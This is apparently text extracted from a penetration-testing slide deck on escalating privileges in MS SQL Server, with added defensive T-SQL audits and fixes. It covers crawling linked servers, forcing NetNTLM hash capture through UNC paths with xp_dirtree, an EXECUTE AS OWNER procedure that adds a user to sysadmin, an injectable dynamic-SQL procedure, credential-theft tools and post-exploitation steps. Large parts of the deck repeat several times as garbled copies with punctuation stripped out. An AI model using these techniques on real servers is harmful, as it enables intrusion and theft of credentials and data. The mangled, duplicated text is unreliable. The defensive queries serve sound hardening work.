Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation Overview: Common Post Exploitation Activities
1 Establish Persistence
• SQL Server Layer: startup procedures, agent jobs, triggers, modified code
• OS Layer: Registry & file auto runs, tasks, services, etc.
2 Identify Sensitive Data
• Target large databases
• Locate transparently encrypted databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Data
• All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
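Added example (not from the original deck): T-SQL that enumerates the SQL Server layer persistence points listed above on one instance, so a reviewer can compare them against known deployments. It assumes a sysadmin connection; every object referenced is a SQL Server system catalog object.

```sql
USE master;
GO
-- 1. Startup procedures: run under the sysadmin context every time the
--    service starts (the "startup procedures" item above).
SELECT  s.name AS [schema], p.name AS [procedure], p.create_date, p.modify_date
FROM sys.procedures AS p
JOIN sys.schemas    AS s ON s.schema_id = p.schema_id
WHERE OBJECTPROPERTY(p.object_id, 'ExecIsStartup') = 1;

-- 2. Server-level DDL and LOGON triggers: fire on every matching event for
--    every login and can carry arbitrary T-SQL. Compare modify_date with
--    your change records and read the definition.
SELECT  t.name, t.type_desc, t.is_disabled, t.create_date, t.modify_date,
        te.type_desc AS fires_on, m.definition
FROM sys.server_triggers          AS t
JOIN sys.server_trigger_events    AS te ON te.object_id = t.object_id
LEFT JOIN sys.server_sql_modules  AS m  ON m.object_id  = t.object_id;

-- 3. Agent jobs and their step commands, CmdExec and PowerShell steps first
--    (those run as the Agent service account unless a proxy is configured).
SELECT  j.name AS job, SUSER_SNAME(j.owner_sid) AS owner, j.enabled,
        j.date_created, j.date_modified,
        st.step_id, st.step_name, st.subsystem, st.proxy_id, st.command
FROM msdb.dbo.sysjobs     AS j
JOIN msdb.dbo.sysjobsteps AS st ON st.job_id = j.job_id
ORDER BY CASE st.subsystem WHEN 'CmdExec' THEN 0 WHEN 'PowerShell' THEN 1 ELSE 2 END,
         j.date_modified DESC, j.name, st.step_id;

-- 4. "Modified code": the most recently changed user modules in the current
--    database (master here; repeat in each application database and diff
--    the definitions against the deployed source).
SELECT TOP (50) s.name AS [schema], o.name AS [module], o.type_desc, o.modify_date
FROM sys.objects AS o
JOIN sys.schemas AS s ON s.schema_id = o.schema_id
WHERE o.type IN ('P', 'TR', 'FN', 'TF', 'IF', 'V') AND o.is_ms_shipped = 0
ORDER BY o.modify_date DESC;
```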
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation/Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don’t have to grant IMPERSONATE
Cons
• No granular control over the database owner’s privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires database to be configured as trustworthy for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation/Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO

SYSADMIN is often the OWNER
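Added example (not from the original deck): an audit query for the preconditions the slide describes, a TRUSTWORTHY database owned by a sysadmin login that contains modules running as OWNER. It assumes a sysadmin connection and SQL Server 2005 or later; all names are system catalog objects.

```sql
USE master;
GO
-- 1. Databases, their owning login, and whether that login is a sysadmin.
--    owner_is_sysadmin = NULL means the owner login no longer exists.
SELECT  d.name                                                  AS [database],
        SUSER_SNAME(d.owner_sid)                                AS owner_login,
        IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid))  AS owner_is_sysadmin,
        d.is_trustworthy_on                                     -- needed for OS commands from the owner context
FROM sys.databases AS d
WHERE d.database_id > 4                                         -- skip master, tempdb, model, msdb
ORDER BY d.is_trustworthy_on DESC, owner_is_sysadmin DESC, d.name;
GO
-- 2. Procedures, functions and triggers that do not run as the caller:
--    execute_as_principal_id = -2 is EXECUTE AS OWNER, any other non-NULL
--    value is a fixed principal. One UNION ALL query over every online user
--    database, built with dynamic SQL so each database's catalog is read.
DECLARE @sql nvarchar(max);
SET @sql = N'';

SELECT @sql += N'UNION ALL SELECT ' + QUOTENAME(d.name, '''') + N' AS [database], '
             + N's.name AS [schema], o.name AS [module], o.type_desc, '
             + N'CASE m.execute_as_principal_id WHEN -2 THEN ''OWNER'' ELSE dp.name END AS runs_as '
             + N'FROM ' + QUOTENAME(d.name) + N'.sys.sql_modules AS m '
             + N'JOIN ' + QUOTENAME(d.name) + N'.sys.objects AS o ON o.object_id = m.object_id '
             + N'JOIN ' + QUOTENAME(d.name) + N'.sys.schemas AS s ON s.schema_id = o.schema_id '
             + N'LEFT JOIN ' + QUOTENAME(d.name) + N'.sys.database_principals AS dp '
             + N'ON dp.principal_id = m.execute_as_principal_id '
             + N'WHERE m.execute_as_principal_id IS NOT NULL' + NCHAR(10)
FROM sys.databases AS d
WHERE d.state_desc = 'ONLINE' AND d.database_id > 4;

IF @sql <> N''
BEGIN
    SET @sql = STUFF(@sql, 1, 10, N'');   -- drop the leading 'UNION ALL '
    EXEC sys.sp_executesql @sql;
END;
```

A hit in query 2 inside a database that query 1 shows as TRUSTWORTHY and sysadmin-owned is the exact shape of sp_escalate_me above.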
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation/Injection Issues
• Use signed procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certificate
o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don’t have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
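Added example (not from the original deck) carrying the seven steps above through in T-SQL for a procedure that needs one server-level permission, VIEW SERVER STATE. MyAppDb and MyAppUser come from the slide; usp_ActiveRequests, the certificate and login names, the master key password and the file path are assumed names and placeholders.

```sql
USE MyAppDb;
GO
-- 1. Create the stored procedure. Reading sys.dm_exec_requests requires
--    VIEW SERVER STATE, which the application user must not hold directly.
CREATE PROCEDURE dbo.usp_ActiveRequests
AS
BEGIN
    SET NOCOUNT ON;
    SELECT session_id, status, command, start_time, database_id
    FROM sys.dm_exec_requests
    WHERE session_id > 50;                       -- user sessions only
END;
GO
-- 2. Create a database master key (protects the certificate's private key).
IF NOT EXISTS (SELECT 1 FROM sys.symmetric_keys WHERE name = N'##MS_DatabaseMasterKey##')
    CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'ReplaceWithAStrongPassword!1';   -- placeholder
GO
-- 3. Create a certificate used only to sign this module.
CREATE CERTIFICATE SigningCert_ActiveRequests
    WITH SUBJECT = 'Signs dbo.usp_ActiveRequests',
         EXPIRY_DATE = '20351231';
GO
-- 4. Create a login from the certificate. Only the public half is exported to
--    master; the private key stays in MyAppDb. A certificate login cannot
--    connect, it exists only to carry permissions.
BACKUP CERTIFICATE SigningCert_ActiveRequests
    TO FILE = 'C:\Certs\SigningCert_ActiveRequests.cer';   -- placeholder path
GO
USE master;
GO
CREATE CERTIFICATE SigningCert_ActiveRequests
    FROM FILE = 'C:\Certs\SigningCert_ActiveRequests.cer';
GO
CREATE LOGIN SigningLogin_ActiveRequests FROM CERTIFICATE SigningCert_ActiveRequests;
GO
-- 5. Configure login privileges: exactly the one permission the procedure needs.
GRANT VIEW SERVER STATE TO SigningLogin_ActiveRequests;
GO
-- 6. Sign the stored procedure with the certificate. Any later ALTER of the
--    procedure invalidates the signature, so the body cannot be widened quietly.
USE MyAppDb;
GO
ADD SIGNATURE TO dbo.usp_ActiveRequests BY CERTIFICATE SigningCert_ActiveRequests;
GO
-- 7. GRANT EXECUTE to the application user. No EXECUTE AS, no TRUSTWORTHY,
--    no IMPERSONATE; db_owner members gain nothing beyond this one procedure.
GRANT EXECUTE ON dbo.usp_ActiveRequests TO MyAppUser;
GO
-- Verify: the certificate whose signature is attached to the module.
SELECT  OBJECT_NAME(cp.major_id) AS signed_module, c.name AS certificate_name, cp.crypt_type_desc
FROM sys.crypt_properties AS cp
JOIN sys.certificates     AS c ON c.thumbprint = cp.thumbprint
WHERE cp.major_id = OBJECT_ID(N'dbo.usp_ActiveRequests');
```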
Escalating Privileges: Impersonation
SQL Injection Example
CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO
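Added example (not from the original deck): the parameterised counterpart of sp_sqli2 above, using sp_executesql so the database name is passed as data and can never close the quote or append a statement. sp_sqli2_fixed is an assumed name.

```sql
CREATE PROCEDURE sp_sqli2_fixed
    @DbName sysname                 -- sysname (nvarchar(128)) is the type of object names
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @query   nvarchar(max);
    DECLARE @pattern nvarchar(130);

    -- Wildcards are added here, as data, not inside the SQL text.
    SET @pattern = N'%' + @DbName + N'%';

    -- The statement text is constant; only the parameter value changes per call.
    SET @query = N'SELECT name FROM master.sys.databases '
               + N'WHERE name LIKE @pattern OR name = N''tempdb'';';

    EXEC sys.sp_executesql @query,
                           N'@pattern nvarchar(130)',
                           @pattern = @pattern;
END;
GO

-- Both calls return database names only. In sp_sqli2 the second value would
-- have broken out of the string literal; here it is just a name that matches
-- nothing.
EXEC sp_sqli2_fixed @DbName = N'MyApp';
EXEC sp_sqli2_fixed @DbName = N'a''b';
```

Because @DbName is still used with LIKE, % and _ in the input act as wildcards; that widens the match but cannot change the statement.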
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1 SysAdmins can execute OS commands
2 OS commands run as the SQL Server service account
3 Service accounts have sysadmin privileges by default
4 Companies often use a single domain account to run hundreds of SQL Servers
5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
[Figure: Leveraging Shared MS SQL Server Service Accounts. Network diagram with Internet, DMZ and Intranet zones; hosts labelled LRA, HVA, LVA and ADS; port labels 80 and 443, 1433 and 1434; attacker "Captain Evil" (PURE EVIL). Steps shown in the build:]
1 SQL Injection
2 Execute local command via xp_cmdshell
3 Access to HVA with shared domain service account: execute commands and gather data from other database servers via osql
Key: HVA = High Value Application; LVA = Low Value Application
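Added example (not from the original deck) serving both the OS Admin to SysAdmin table and the shared service account slide: T-SQL that shows which Windows principals hold sysadmin on an instance and which account the services run as. It assumes a sysadmin connection; sys.dm_server_services exists from SQL Server 2008 R2 SP1.

```sql
-- 1. Direct members of the sysadmin server role. BUILTIN\Administrators here
--    is the "Local Administrator" row of the table (every local admin is
--    sysadmin); NT AUTHORITY\SYSTEM is the "LocalSystem" row.
SELECT  m.name                      AS member,
        m.type_desc,
        m.is_disabled,
        CASE m.name
            WHEN N'BUILTIN\Administrators' THEN N'local admins are sysadmin'
            WHEN N'NT AUTHORITY\SYSTEM'    THEN N'LocalSystem is sysadmin'
            ELSE N''
        END                         AS note
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin'
ORDER BY note DESC, m.name;

-- 2. The accounts the services run as, and whether each has a sysadmin login
--    (NULL = no login by that name). A domain account that shows up here on
--    many instances is the shared service account the slide warns about;
--    collect this column across the estate and count repeats.
SELECT  servicename,
        service_account,
        IS_SRVROLEMEMBER('sysadmin', service_account) AS account_is_sysadmin,
        startup_type_desc,
        status_desc
FROM sys.dm_server_services;

-- 3. Version, to read the table's columns against this instance.
SELECT  SERVERPROPERTY('ProductVersion') AS product_version,
        SERVERPROPERTY('Edition')        AS edition;
```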
Escalating Privileges
Crawling Server Links
Escalating Privileges: Crawling Server Links
What’s a database link?
Database links are basically persistent database connections for SQL Servers
Why should I care?
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
[Figure: Leveraging MS SQL Database links. Same network diagram (Internet, DMZ, Intranet; LRA, HVA, LVA, ADS; port labels 80 and 443, 1433 and 1434); DB1 is an LVA database server; attacker "Captain Evil". Steps shown in the build:]
1 SQL Injection against DB1
DB link with least privileges, then DB link with SA account
2 Execute SQL queries and local commands on database servers via nested linked services
Key: HVA = High Value Application; LVA = Low Value Application
Escalating Privileges: Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of environments we’ve seen
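Added example (not from the original deck): an inventory of linked servers and the login mappings behind them, flagging the configurations a link crawl relies on. It assumes a sysadmin connection; SQLSERVER2 in the mitigation is the link name from the slide and link_reader is an assumed remote login.

```sql
-- 1. Every linked server with the mapping each local principal gets.
--    local_principal_id 0 is the catch-all "all other logins" entry, which is
--    what the public role (every login on this instance) travels over.
SELECT  s.name                           AS linked_server,
        s.product, s.provider, s.data_source,
        s.is_data_access_enabled,        -- OPENQUERY / four-part names
        s.is_rpc_out_enabled,            -- EXEC ... AT <server> on the far side
        CASE WHEN ll.local_principal_id = 0 THEN N'<all other logins>'
             ELSE SUSER_NAME(ll.local_principal_id) END                AS local_login,
        CASE WHEN ll.uses_self_credential = 1 THEN N'pass-through as the caller'
             WHEN ll.remote_name IS NULL        THEN N'no mapping (connection denied)'
             ELSE N'fixed remote login ' + ll.remote_name END          AS remote_identity,
        CASE WHEN ll.local_principal_id = 0 AND ll.remote_name = N'sa'
                  THEN N'HIGH: every login becomes sa on the remote server'
             WHEN ll.local_principal_id = 0 AND ll.remote_name IS NOT NULL
                  THEN N'HIGH: every login shares one fixed remote identity'
             WHEN ll.remote_name = N'sa'
                  THEN N'HIGH: fixed sa mapping'
             WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 1
                  THEN N'MEDIUM: pass-through for every login'
             ELSE N'review' END                                        AS finding
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;

-- 2. Mitigation for a link that only needs to read data: turn off rpc out so
--    EXEC ... AT (and therefore xp_cmdshell through the link) is refused, and
--    point the catch-all mapping at a dedicated low-privilege remote login.
EXEC sys.sp_serveroption     @server = N'SQLSERVER2', @optname = N'rpc out', @optvalue = N'false';
EXEC sys.sp_addlinkedsrvlogin @rmtsrvname = N'SQLSERVER2', @useself = N'False',
                              @locallogin = NULL,          -- NULL = all other logins
                              @rmtuser = N'link_reader', @rmtpassword = N'<placeholder>';
```

Run query 1 on each instance and follow the data_source column outward; a chain of HIGH findings is exactly the nested-link path drawn in the figure above.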
Escalating Privileges: UNC Path Injection
UNC paths are used for accessing remote file servers like so: \\192.168.1.4\file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges: UNC Path Injection
Oh yeah…
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtree
xp_fileexist
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default
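Added example (not from the original deck): the check and the hardening that follow from the summary above, run in master. It assumes a sysadmin connection; xp_subdirs is listed alongside the two procedures named on the slide because it takes a path the same way, and the first query shows whether it is actually granted.

```sql
USE master;
GO
-- 1. Who may execute the file-path extended procedures. A default install
--    carries GRANT EXECUTE to public on xp_dirtree and xp_fileexist, which is
--    what lets any login make the service account authenticate outbound.
SELECT  o.name            AS procedure_name,
        pr.name           AS grantee,
        dp.state_desc,
        dp.permission_name
FROM sys.all_objects AS o
JOIN sys.database_permissions AS dp
      ON dp.class = 1                      -- object-level permission
     AND dp.major_id = o.object_id
JOIN sys.database_principals AS pr
      ON pr.principal_id = dp.grantee_principal_id
WHERE o.type = 'X'                         -- extended stored procedure
  AND o.name IN (N'xp_dirtree', N'xp_fileexist', N'xp_subdirs')
ORDER BY o.name, pr.name;
GO
-- 2. Remove the default grant. Sysadmins are unaffected; anything else that
--    still needs a procedure can be granted it explicitly afterwards.
REVOKE EXECUTE ON sys.xp_dirtree   FROM public;
REVOKE EXECUTE ON sys.xp_fileexist FROM public;
REVOKE EXECUTE ON sys.xp_subdirs   FROM public;
GO
-- 3. Confirm nothing is left for public.
SELECT o.name
FROM sys.all_objects AS o
JOIN sys.database_permissions AS dp ON dp.class = 1 AND dp.major_id = o.object_id
WHERE o.name IN (N'xp_dirtree', N'xp_fileexist', N'xp_subdirs')
  AND dp.grantee_principal_id = DATABASE_PRINCIPAL_ID(N'public');
```

Some tooling (SSMS file-browsing dialogs, log shipping, third-party backup agents) calls these procedures under non-sysadmin logins, so review query 1's grantees and test before revoking. Pair the revoke with egress filtering of SMB from database servers, which stops the authentication from reaching an outside host regardless of which procedure triggers it.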
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
